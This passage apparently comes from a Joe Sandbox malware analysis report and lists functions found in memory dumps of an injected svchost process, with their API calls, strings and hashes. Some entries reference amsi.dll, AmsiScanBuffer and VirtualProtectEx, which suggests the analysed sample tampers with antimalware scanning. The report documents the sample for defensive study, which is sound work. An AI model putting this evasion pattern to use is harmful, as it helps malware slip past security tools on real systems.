GetModuleHandleExW.KERNEL32 ref: 00000195DE1AB929
GetProcAddress.KERNEL32 ref: 00000195DE1AB93F
FreeLibrary.KERNEL32 ref: 00000195DE1AB95B

Strings

CorExitProcess, xrefs: 00000195DE1AB938
mscoree.dll, xrefs: 00000195DE1AB920

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: c2ea74d0e4b43787c242fccb3ca49c895b892b977b25d57424b6dfe402f8caf7
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 4EF09071301F4181EB268BE4A8B57A963A2EBDA766F940319DA6A651E4CF3CD44DE300

Function 00000195DE1A3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,00000195DE1A275A), ref: 00000195DE1A372A
StrCpyW.SHLWAPI ref: 00000195DE1A373A
StrCatW.SHLWAPI ref: 00000195DE1A3746
PathCombineW.SHLWAPI(?,?,00000000,00000195DE1A275A), ref: 00000195DE1A3754

Strings

\\.\pipe\, xrefs: 00000195DE1A3720

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: a3bbb5c4d7fce30f9518b8c66632d3fb4f5c13679670c1bdd0da67fe5652c17b
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 56F08974314F8081EB468BD3B9241A976A3B799FC1F444030ED0667764CE3CD4499700

Function 00000195DD5C3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,00000195DD5C275A), ref: 00000195DD5C372A
StrCpyW.SHLWAPI ref: 00000195DD5C373A
StrCatW.SHLWAPI ref: 00000195DD5C3746
PathCombineW.SHLWAPI(?,?,00000000,00000195DD5C275A), ref: 00000195DD5C3754

Strings

\\.\pipe\, xrefs: 00000195DD5C3720

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 4a029afccfd20abfc000deb6728c4e17700f5b9d3ba93e1edbb5746d1dd9f9cc
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: ADF05E74304F8482EB059F97B92419962E2AB49FC1F448430EE0A67F18CE68C5458750

Function 00000195DD5CB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000195DD5CB929
GetProcAddress.KERNEL32 ref: 00000195DD5CB93F
FreeLibrary.KERNEL32 ref: 00000195DD5CB95B

Strings

CorExitProcess, xrefs: 00000195DD5CB938
mscoree.dll, xrefs: 00000195DD5CB920

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: ff1f608ab6b6f35458b95ed6a99513a04395d250144898ac4917ce25a483aeec
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: B1F0BB31301F0541FF118B94D8643E923F2EB45761F540319DA7A55AE8CF3CC449C310

Function 00000195DE1A1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00000195DE1A1E47
GetProcAddress.KERNEL32 ref: 00000195DE1A1E57
Sleep.KERNEL32 ref: 00000195DE1A1E67

Strings

AmsiScanBuffer, xrefs: 00000195DE1A1E50
amsi.dll, xrefs: 00000195DE1A1E40

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 021e1d068d77b3df3e73d62d2490259398199a639ad21284c0ee90d309d470d8
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 9BD06770B15E00D5EB4BABD1E8B53E832E3ABF5B02FC80815C50A252A0DE2CA55DE340

Function 00000195DE1A5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000195DE1A5896

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 8c5fc4f44a05ee5ee593e4b34b3eab8e4509f5c5cbb5b3cfab8dac729e4b2368
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 9402D93621DB8486E761CB95F4A13AAB7E1F3C4794F104015EA8E97BA8DF7CD489DB00

Function 00000195DD5C5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000195DD5C5896

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 4f7c97b87c585921e5957ddec0f3c0c97a09a4b464653c87013dffe8e29aad42
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: C402B736219B8486E7A1CB99F4A039AB7E1F3C4794F104115EA8E97FA9DF7CC494CB00

Function 00000195DE1A2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000195DE1A2CAD
TlsGetValue.KERNEL32 ref: 00000195DE1A2CBC
TlsGetValue.KERNEL32 ref: 00000195DE1A2CCB
TlsSetValue.KERNEL32 ref: 00000195DE1A2E0F
TlsSetValue.KERNEL32 ref: 00000195DE1A2E1E
TlsSetValue.KERNEL32 ref: 00000195DE1A2E2D

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: c38a1825a7be4ae8512867ee821e683eadb78cd61cf93f1acaa63eb26394960e
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: CC51B435744F1187E366CBD6E4616A9B3E2F784B44F504119DD4AA3B54DF38E84EE700

Function 00000195DD5C2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000195DD5C2CAD
TlsGetValue.KERNEL32 ref: 00000195DD5C2CBC
TlsGetValue.KERNEL32 ref: 00000195DD5C2CCB
TlsSetValue.KERNEL32 ref: 00000195DD5C2E0F
TlsSetValue.KERNEL32 ref: 00000195DD5C2E1E
TlsSetValue.KERNEL32 ref: 00000195DD5C2E2D

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 642933fc255e9386b03da153ad2cad646397c63b6e49b96fafd9578adb96d7a2
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 8551E535616E0587E326DF9AE460E9A73E2F788B80F544029DD5BA3F54DF38C846CB00

Function 00000195DE1A2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000195DE1A2AE1
TlsGetValue.KERNEL32 ref: 00000195DE1A2AF0
TlsGetValue.KERNEL32 ref: 00000195DE1A2AFF
TlsSetValue.KERNEL32 ref: 00000195DE1A2C3B
TlsSetValue.KERNEL32 ref: 00000195DE1A2C4A
TlsSetValue.KERNEL32 ref: 00000195DE1A2C59

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: a10af872b50eb1a9a9280d86d9e28e416f0bd79b10d8077c762e4f2d1207b409
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: DE51B331754F5187E726CFD6A4616AAB3E7F389B80F404119ED4AA3754DF38E80AEB00

Function 00000195DD5C2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000195DD5C2AE1
TlsGetValue.KERNEL32 ref: 00000195DD5C2AF0
TlsGetValue.KERNEL32 ref: 00000195DD5C2AFF
TlsSetValue.KERNEL32 ref: 00000195DD5C2C3B
TlsSetValue.KERNEL32 ref: 00000195DD5C2C4A
TlsSetValue.KERNEL32 ref: 00000195DD5C2C59

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 3419e39d5dfc8618c6cb42f13176a5100fc5763297956d13e738e13f4def0ff4
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 1051F636215E058BE726DF9AE460E9A73E2F399B84F044128DD4AA3F54DF78C845DB00

Function 00000195DE1A5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000195DE1A5E66

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 8b1623c9a997c05870e75cae67668f9ea54e0202be8e43d5c9b55d9289c29d55
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 2161C836229B40C7E761CBD5E4613AAB7E2F388748F500115FA8DA3BA8DB7CD549DB00

Function 00000195DD5C5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000195DD5C5E66

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 4d71cc3e8c28c4a99451ce990ba2a57135bd39b0a39f47405538629a8d43bfe2
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: DA61D97652AE48C6E761DB99E46035AB7E6F388744F100215FA8EA3FA8DB7CC540CF40

Function 00000195DE1A3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000195DE1A3A5B), ref: 00000195DE1A3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DE1A3A5B), ref: 00000195DE1A3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DE1A3A5B), ref: 00000195DE1A3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DE1A3A5B), ref: 00000195DE1A3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DE1A3A5B), ref: 00000195DE1A3F68

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 181deb5af24db71487740a702734a9885fa1e3cdadad012e8771009305f1b826
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 4E115136B18B4083EB66DBA1E41439D77B2F785B80F040026EE4D63754EB7DD549D781

Function 00000195DD5C3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F68

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: d6e6c87c07e18ba0bfce4eac5e3abc533af6eca957da19e2ae1cfdecc773412f
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 6B118236605B4483FB258B65E41428A67F1FB46B80F040426DE4D53BA8EBBDC984C790

Function 00000195DE1A8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000195DE1A8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000195DE1A8D62
RtlUnwindEx.NTDLL ref: 00000195DE1A8DBC

Strings

csm, xrefs: 00000195DE1A8D49

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: ddf1d67b6abdcfd21630125507b16972c9ca43dbfd4026023b7f6bef278932f7
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: B751A032311B00CADB56CBE9E469BBCB7D3E354B88F148121DA4A57788DB79E84AD700

Function 00000195DD5C8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000195DD5C8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000195DD5C8D62
RtlUnwindEx.NTDLL ref: 00000195DD5C8DBC

Strings

csm, xrefs: 00000195DD5C8D49

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: c21b00fe6cdef15fa98b7eeb5f0993215e0ce655c9d121a96d82298fb6486740
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: B951D632312E048ADB5ACF9DE464BED7BD3F354B98F144161DA5A97B88EB78D841C700

Function 00000195DE1AAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000195DE1AAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000195DE1AABBC

Strings

csm, xrefs: 00000195DE1AAC0E
